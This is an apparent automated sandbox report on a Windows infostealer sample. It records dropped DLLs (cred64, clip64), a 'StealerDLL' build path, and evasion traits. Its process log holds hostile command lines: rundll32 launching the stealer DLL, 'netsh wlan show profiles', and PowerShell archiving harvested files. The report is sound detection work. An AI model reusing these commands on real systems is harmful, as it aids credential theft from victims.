Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior

Uses 32bit PE files

Source: wIaKimJFke.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wIaKimJFke.exe	Static PE information: Section: ZLIB complexity 0.9976810003443526
Source: wIaKimJFke.exe	Static PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649
Source: explorgu.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9976810003443526
Source: explorgu.exe.0.dr	Static PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@15/21@0/1

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

File created: C:\Users\user\AppData\Roaming\006700e5a2ab05

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File created: C:\Users\user\AppData\Local\Temp\00c07260dc

Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main

Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64.dll.5.dr, cred64[1].dll.5.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: wIaKimJFke.exe

ReversingLabs: Detection: 71%

Source: wIaKimJFke.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorgu.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorgu.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File read: C:\Users\user\Desktop\wIaKimJFke.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wIaKimJFke.exe "C:\Users\user\Desktop\wIaKimJFke.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: wIaKimJFke.exe

Static file information: File size 1906688 > 1048576

Source: wIaKimJFke.exe

Static PE information: Raw size of qrqrzugw is bigger than: 0x100000 < 0x1a0400

Source:

Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Unpacked PE file: 0.2.wIaKimJFke.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Unpacked PE file: 1.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Unpacked PE file: 5.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: cred64[1].dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x14318c
Source: clip64.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: explorgu.exe.0.dr	Static PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
Source: clip64[1].dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: wIaKimJFke.exe	Static PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
Source: cred64.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x14318c

PE file contains sections with non-standard names

Source: wIaKimJFke.exe	Static PE information: section name:
Source: wIaKimJFke.exe	Static PE information: section name: .idata
Source: wIaKimJFke.exe	Static PE information: section name:
Source: wIaKimJFke.exe	Static PE information: section name: qrqrzugw
Source: wIaKimJFke.exe	Static PE information: section name: ajeqznom
Source: wIaKimJFke.exe	Static PE information: section name: .taggant
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: .idata
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: qrqrzugw
Source: explorgu.exe.0.dr	Static PE information: section name: ajeqznom
Source: explorgu.exe.0.dr	Static PE information: section name: .taggant
Source: cred64[1].dll.5.dr	Static PE information: section name: _RDATA
Source: cred64.dll.5.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_004FD2A1 push ecx; ret	0_2_004FD29F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E2269E6 push ecx; ret	10_2_6E2269F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B700942 push E95B63D0h; ret	11_2_00007FFD9B7009C9

Source: wIaKimJFke.exe	Static PE information: section name: entropy: 7.985573734729088
Source: wIaKimJFke.exe	Static PE information: section name: qrqrzugw entropy: 7.952553763382188
Source: explorgu.exe.0.dr	Static PE information: section name: entropy: 7.985573734729088
Source: explorgu.exe.0.dr	Static PE information: section name: qrqrzugw entropy: 7.952553763382188

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wIaKimJFke.exe	File created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: FilemonClass	Jump to behavior
